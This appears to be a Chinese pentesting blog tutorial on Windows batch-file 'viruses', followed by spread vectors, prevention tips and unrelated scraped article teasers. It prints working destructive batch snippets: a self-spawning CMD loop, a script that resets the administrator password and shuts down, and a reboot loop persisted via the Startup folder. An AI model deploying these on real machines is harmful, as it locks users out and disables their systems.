#渗透测试#SRC漏洞挖掘# 操作系统-windows系统bat病毒

免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。                                                              #陇羽sec#
 

目录

什么是bat 病毒

资源耗尽病毒

锁机病毒

无限重启病毒

 windows 系统目录接管与渗透的关系

开机自启目录

BAT病毒的传播方式

电子邮件附件

文件共享网络

恶意网站

USB设备

社交工程学

 防范BAT病毒的最佳实践

使用防病毒软件

更新操作系统和软件

谨慎处理电子邮件附件

避免使用不明来源的软件

启用防火墙

定期备份数据

教育和培训

关闭不必要的系统功能

使用复杂的密码

审查系统自启动项


什么是bat 病毒

BAT病毒是一种通过批处理(BAT)文件创建恶意行为的病毒。以下是关于BAT病毒的一些特点:

  • 恶意行为表现

    • 无限循环导致系统卡死:例如通过在BAT文件中编写代码无限循环打开命令提示符(CMD),从而使计算机卡死。像“%0”这样的代码可以用来循环执行整个BAT文件,而简单写法甚至可以省略“cmd”,仅用“start”就能打开CMD,若再加上开机自动启动代码并隐藏在磁盘角落,会造成电脑性能下降,对用户造成困扰 。

    • 整蛊行为:如远程弹窗刷屏、设置关闭显示器、让系统崩溃、编写假蓝屏代码等行为。可以编写批处理文件(.bat)让计算机蓝屏,不过这种操作可能导致数据丢失和系统损坏。

  • 病毒防范与清除:存在针对BAT病毒的清除工具(.bat文件形式),但可能会被360等杀毒软件误认成病毒,此时需要用户选择信任该文件以执行其保护计算机的功能。

BAT病毒主要是利用批处理文件的一些特性来执行破坏计算机功能或者影响计算机正常使用的操作。

资源耗尽病毒
echo start cmd > 1.txt
echo %0 >> 1.txt
ren 1.txt 1.bat命令解释这个命令序列的目的是创建一个批处理文件(.bat),并将当前批处理文件的名称写入该文件中。
命令1: echo start cmd > 1.txt解释: 这个命令将字符串 start cmd 写入到一个名为 1.txt 的文本文件中。效果: 创建了一个名为 1.txt 的文件,文件内容为 start cmd。命令2: echo %0 >> 1.txt解释: 这个命令将当前批处理文件的名称(%0)追加到 1.txt 文件中。效果: 1.txt 文件的内容现在变为 start cmd 后跟当前批处理文件的名称。命令3: ren 1.txt  1.bat解释: 这个命令将 1.txt 文件重命名为 1.bat 。效果: 1.txt 文件被重命名为 1.bat ,现在它是一个批处理文件。
锁机病毒
echo net user adminstrator 123456 > c:\windows\Temp\1.bat
echo shutdown /n /t 0 >> c:\windows\Temp\1.bat这条命令的作用是将 net user adminstrator 123456 这行命令写入到 c:\windows\Temp\1.bat 文件中。echo:用于输出指定的内容。net user adminstrator 123456:这条命令尝试将 adminstrator 用户的密码设置为 123456。> c:\windows\Temp\1.bat :将输出的内容重定向到 c:\windows\Temp\1.bat 文件中。这条命令的作用是将 shutdown /n /t 0 这行命令追加到 c:\windows\Temp\1.bat 文件中。echo:用于输出指定的内容。shutdown /n /t 0:这条命令用于立即关闭计算机。/n:表示立即关闭。/t 0:表示延迟时间为0秒。>> c:\windows\Temp\1.bat :将输出的内容追加到 c:\windows\Temp\1.bat 文件中。运行这个批处理文件将会:尝试将 adminstrator 用户的密码设置为 123456。立即关闭计算机。
无限重启病毒
echo shutdown /n /t 0 > c:\windows\Temp\1.bat
copy c:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"命令1: echo shutdown /n /t 0 > c:\windows\Temp\1.bat功能: 创建一个批处理文件 1.bat 并写入命令 shutdown /n /t 0。解释:echo: 输出指定的字符串或命令。shutdown /n /t 0: 这是Windows的关机命令,/n 表示不记录关机事件,/t 0 表示立即关机。> c:\windows\Temp\1.bat: 将输出的内容重定向到文件 c:\windows\Temp\1.bat 。命令2: copy c:\windows\Temp\1.bat  "%USERPROFILE%\AppDate\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"功能: 将创建的批处理文件复制到Windows启动文件夹中。解释:copy: 复制文件的命令。c:\windows\Temp\1.bat: 源文件路径。"%USERPROFILE%\AppDate\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\": 目标文件夹路径。注意,AppDate 应该是 AppData,这是一个常见的拼写错误。
 windows 系统目录接管与渗透的关系
"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup\"
这个路径指向的是Windows操作系统中的启动文件夹。任何被放置在这个文件夹内的程序或脚本都会在用户登录后自动运行。
开机自启目录
c:\windows\Temp\1.bat
(重启自动清空缓存)
文件“c:\windows\Temp\1.bat ”是一个批处理文件(Batch file),它包含了Windows操作系统可以执行的一系列命令。批处理文件通常用于自动化重复性的任务,例如启动程序、移动文件、设置系统参数等。请注意,位于系统临时文件夹(如C:\Windows\Temp)中的批处理文件可能包含敏感信息或执行特定的系统操作。如果您不是创建者或不熟悉该文件的内容,建议您谨慎对待,并确保您的系统安全措施到位。如果您想查看该批处理文件的内容,可以尝试以下步骤:定位文件:首先,导航到C:\Windows\Temp文件夹。请注意,由于这是系统文件夹,您可能需要管理员权限来访问和查看其中的文件。打开文件:找到名为1.bat 的文件后,双击它可能会直接执行其中的命令。如果您只想查看其内容而不执行它,可以右键点击文件,然后选择“编辑”或“记事本”来打开它。这将显示文件中的命令和脚本。注意安全风险:由于这是系统临时文件夹中的文件,它可能包含临时或敏感信息。请确保您了解文件的来源和内容,以避免潜在的安全风险。

BAT病毒的传播方式

电子邮件附件

发送带有恶意代码的电子邮件附件是BAT病毒常见的传播方式之一。攻击者通常会伪装成可信的来源,诱导收件人下载并执行附件中的BAT文件,从而感染目标系统。

文件共享网络

在局域网或公共文件共享网络中,用户可能会无意间下载并执行包含BAT病毒的文件。这些文件可能被命名得极具诱惑力,诱使用户点击打开。

恶意网站

访问被植入恶意代码的网站也可能导致BAT病毒的传播。这些网站可能包含自动下载并执行恶意BAT文件的脚本,用户在不知情的情况下就会受到感染。

USB设备

通过USB驱动器等可移动存储设备传播BAT病毒也是一种常见手段。攻击者可能将恶意BAT文件复制到这些设备上,当其他用户插入这些设备时,如果他们不小心执行了其中的文件,就会导致病毒感染。

社交工程学

攻击者还可能利用社交工程学技巧,诱导用户执行特定的操作,如下载并运行某个文件,从而传播BAT病毒。这通常涉及到欺骗或误导用户,使其相信某个行为是安全的。

 防范BAT病毒的最佳实践

使用防病毒软件

使用可靠的防病毒软件是防范BAT病毒及其他类型病毒的基础。确保防病毒软件始终保持最新状态,以便能够检测和防御最新的威胁。定期进行全系统扫描,及时发现并清除潜在的病毒。

更新操作系统和软件

及时给操作系统和所有应用程序打上补丁,修复安全漏洞。许多病毒都是利用软件漏洞进行传播的,因此保持系统和软件的最新状态是防止病毒感染的关键。

谨慎处理电子邮件附件

不要随意打开来自不明来源的电子邮件附件,特别是那些带有.exe、.com或其他可执行文件扩展名的附件。如果必须打开附件,先用防病毒软件进行扫描。

避免使用不明来源的软件

从官方或可信的来源下载和安装软件,避免使用盗版软件或从不明网站下载的软件。这些软件可能包含恶意代码,包括BAT病毒。

启用防火墙

确保操作系统的防火墙处于启用状态,它可以阻止未经授权的访问和潜在的恶意流量。此外,也可以考虑安装第三方防火墙软件,提供更高级别的保护。

定期备份数据

定期备份重要数据,以防万一遭受病毒攻击或其他类型的灾难。可以选择使用外部硬盘、网络存储或云服务进行备份。

教育和培训

提高自身的网络安全意识,了解常见的网络攻击手段和防范措施。对于组织来说,定期进行员工网络安全培训也是非常重要的。

关闭不必要的系统功能

关闭不需要的系统功能和服务,减少潜在的攻击面。例如,如果不需要远程桌面协议(RDP),应该关闭此功能以防止被黑客利用。

使用复杂的密码

设置强密码,并定期更换。避免在不同的账户上使用相同的密码,以防止一处泄露导致多处受影响。

审查系统自启动项

定期审查系统自启动项,移除不需要的自启动程序。这样可以防止某些病毒通过自启动机制重新感染系统。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/59372.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【OJ题解】在字符串中查找第一个不重复字符的索引

💵个人主页: 起名字真南 💵个人专栏:【数据结构初阶】 【C语言】 【C】 【OJ题解】 目录 1. 引言2. 题目分析示例: 3. 解题思路思路一:双重循环思路二:哈希表 4. C代码实现5. 代码详解6. 时间和空间复杂度分析7. 优化方…

el-date-picker日期选择器动态设置日期

需求&#xff1a;选择开始时间&#xff0c;或者在开始时间已存在的情况下&#xff1b;结束时间下拉日期选择框展示从开始日期展示&#xff1b;而不是当前日期&#xff0c;并且结束时间下拉框日期要禁用开始时间之前的日期。 <el-form-item label"开始时间" prop&q…

「C/C++」C/C++的区别

✨博客主页何曾参静谧的博客&#x1f4cc;文章专栏「C/C」C/C程序设计&#x1f4da;全部专栏「VS」Visual Studio「C/C」C/C程序设计「UG/NX」BlockUI集合「Win」Windows程序设计「DSA」数据结构与算法「UG/NX」NX二次开发「QT」QT5程序设计「File」数据文件格式「PK」Parasoli…

Redis-基本了解

一、Redis 初识 Redis 是⼀种基于键值对&#xff08;key-value&#xff09;的NoSQL数据库&#xff0c;与很多键值对数据库不同的是&#xff0c;Redis 中的值可以是由string&#xff08;字符串&#xff09;、hash&#xff08;哈希&#xff09;、list&#xff08;列表&#xff09…

大模型面试题持续更新_Moe(2024-10-30)

获取更多面试真题的集合&#xff0c;请移步至 https://i.afbcs.cn/naPbNYhttps://pica.zhimg.com/80/v2-7fd6e77f69aa02c34ca8c334870b3bcd_720w.webp?sourced16d100b Moe和集成学习方法有什么异同&#xff1f; MoE和集成学习的思想异曲同工&#xff0c;都是集成了多个模型的…

centos插U盘在什么路径访问

在CentOS系统中&#xff0c;插入U盘后&#xff0c;通常需要挂载U盘才能访问其中的文件。以下是挂载U盘并访问的步骤&#xff1a; 查看U盘设备&#xff1a; 使用fdisk -l命令查看U盘的设备名称&#xff0c;例如/dev/sdb1。 创建挂载点&#xff1a; 在/mnt目录下创建一个用于挂载…

Android Studio:connect time out

参考&#xff1a;Android Studio&#xff1a;connect time out_android studio connection timed out-CSDN博客

配置深度学习环境

先前已经配置好了 1在新建一个项目时 2.打开文件&#xff0c;找到设置 3.点开设置 如图1.2.3所示

PHP不良事件上报系统源码,医院安全不良事件管理系统,基于 vue2+element+ laravel框架开发

不良事件上报系统通过 “事前的人员知识培训管理和制度落地促进”、“事中的事件上报和跟进处理”、 以及 “事后的原因分析和工作持续优化”&#xff0c;结合预存上百套已正在使用的模板&#xff0c;帮助医院从对护理事件、药品事件、医疗器械事件、医院感染事件、输血事件、意…

Rust 力扣 - 2461. 长度为 K 子数组中的最大和

文章目录 题目描述题解思路题解代码题目链接 题目描述 题解思路 我们遍历长度为k的窗口&#xff0c;用一个哈希表记录窗口内的所有元素&#xff08;用来对窗口内元素去重&#xff09;&#xff0c;我们取哈希表中元素数量等于k的窗口总和的最大值 题解代码 use std::collecti…

深入理解 Linux du 命令:用法详解与使用示例

深入理解 Linux df 命令&#xff1a;用法详解与使用示例   du 命令是一个非常常用的工具&#xff0c;它用于统计文件和目录的磁盘使用情况。作为 GNU Coreutils 的一部分&#xff0c;du 具备强大的功能&#xff0c;可以递归地计算每个文件或目录的大小&#xff0c;并以各种格…

yolov8涨点系列之C2f模块改进主分支

文章目录 C2F 模块介绍定义与基本原理应用场景 C2f模块修改步骤(1) C2f_up模块编辑(2)在__init_.pyblock.py中声明&#xff08;3&#xff09;在task.py中声明yolov8引入C2f_up模块yolov8.yamlyolov8.yaml引入C2f_up模块 C2f改进对YOLOv8检测具有多方面的好处 C2F 模块介绍 定义…

数字IC后端实现Innovus 时钟树综合(Clock Tree Synthesis)典型案例

对于如下所示电路&#xff0c;要求以下几路做到等长&#xff0c;clock skew控制在50ps以内&#xff0c;clock tree insertion delay做到800ps! from FF/Q to FF1_1/D through the FF1 CK from FF/Q to FF2_1/D through the FF2 CK from FF/Q to FF3_1/D through the FF3 CK fr…

STM32F030中断言的使用分享

前言 最近在写一个程序中&#xff0c;想对存到FLASH中的结构体分配的大小做控制&#xff0c;希望分配的大小偶数字节大小。&#xff08;因为读时是按16位读&#xff0c;如果奇数就可能读超了&#xff09;如果结构体大小为奇数&#xff0c;就跳到断言处。 分析 STM32F030的标…

什么是Java的线程(Thread)?

Java的线程&#xff08;Thread&#xff09;是Java程序中执行的最小单位。线程是操作系统调度的基本单位&#xff0c;它可以独立执行一段代码&#xff0c;并拥有自己的程序计数器、栈和局部变量。Java中的线程通过使用Thread类来实现&#xff0c;可以通过继承Thread类或实现Runn…

Flutter使用share_plus是提示发现了重复的类

问题描述 我现在下载了share_plus包后发现代码编译不通过&#xff0c;并提示Duplicate class kotlin.collections.jdk8.CollectionsJDK8Kt found in modules jetified-kotlin-stdlib-1.8.22 (org.jetbrains.kotlin:kotlin-stdlib:1.8.22) and jetified-kotlin-stdlib-jdk8-1.7…

基于STM32的远距离遥控自动避障小车设计

引言 本项目基于STM32微控制器设计一个远距离遥控自动避障小车系统。该系统通过蓝牙或Wi-Fi模块实现远程控制&#xff0c;同时结合超声波传感器和红外传感器&#xff0c;实现自主避障功能。小车支持多种操作模式&#xff0c;包括手动遥控、自动避障和路径跟踪&#xff0c;适用…

Web Broker(Web服务应用程序)入门教程(2)

1. Web 调度器(Web Dispatcher) 如果您使用的是 Web 模块,它就充当 Web 调度器的角色。如果您使用的是现成的数据模块,则必须向该数据模块中添加一个单一的调度器组件(Web.HTTPApp.TWebDispatcher)。调度器维护着一个动作项集合,这些动作项知道如何处理特定类型的请求消息…

gitee 使用 webhoot 触发 Jenkins 自动构建

一、插件下载和配置 Manage Jenkins>Plugin Manager 搜索 gitee 进行安装 插件配置 1、前往Jenkins -> Manage Jenkins -> System -> Gitee Configuration -> Gitee connections 2、在 Connection name 中输入 Gitee 或者你想要的名字 3、Gitee host URL 中…

springboot yml文件数据源出现警告/报黄/数据库配置警告问题

1、看一下数据源的依赖是不是都引入完整了 2、看一下数据源是否有拼写错误 上图就是数据源拼写错误